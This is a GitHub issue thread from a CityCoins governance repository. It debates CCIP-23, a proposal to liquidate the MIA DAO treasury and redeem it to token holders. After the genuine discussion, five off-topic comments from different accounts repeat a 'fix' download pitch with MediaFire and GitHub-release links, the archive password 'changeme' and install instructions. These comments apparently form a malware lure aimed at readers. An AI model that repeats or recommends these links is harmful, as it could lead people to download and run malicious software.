### ISSUE TITLE
CCIP-23 MIA Liquidation

### ISSUE THREAD

**Issue by CrypDohDS** [citycoins/governance#41]
CCIP-23 comment: Following the community discussion on MIA redemption from the CityCoins discord it is best to proceed with the CCIP-23 draft. In CCIP-12 and CCIP-13 the MIA DAO was formed and the treasury was moved and stacked. This occurred in summer 2022 during a time of crypto unrest, political embarrassment, many developers abandoning and then the Miami Mayor's public comments of a failed project. The project suffered catastrophic value losses to the investors, centralized exchange OKCoin, but most importantly the long term hodlers. It is just and fair to complete full redemption of treasury to the current hodlers. The necessary closure of the CityCoins project was initiated in March 2024 due to accumulation of technical debt. CCIP-20 ended the stacking and mining of both MIA and NYC. After flavorful discussions, CCIP-22, the NYC liquidation, provided the proof of concept, community vote, and ability to provide the redemption contract for MIA. The community in discord respects the City of Miami and their milestone integrating Cryptocurrency ambition, but likely were just too early in their approach. CCIP-23 proposes 100% liquidation in 2 months time or 8000 bitcoin blocks. This amount of time will allow for any concern by Miami to respond to the DAO and community intention. Great progress has been made with CityCoins. This is the most fair, simple, honors the milestones, and is an ethical approach. CCIP-23 will use the CCIP-15 voting mechanism with a requirement of 25% of token hodlers and >50% vote to affirm or reject the proposal. The structure of CCIP-23 and the redemption contract CCD12-NYC will be used for the design of MIA liquidation. I'm in support of liquidation to further support the STX projects in the ecosystem or if Miami has concern the DAO can revert back to propose CCIP-19 for continued stacking.

**Comment by hanjumeok** [comment]
I agree. We've given a lot of time, and now we won't passively wait any longer.

**Comment by CrypDohDS** [comment]
I would like to add that as a truly decentralized DAO and community we can individually contribute to our charities of choice. I'm a supporter of the Wounded Warrior Project, ALS Foundation, and St.Jude's hospitals.

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
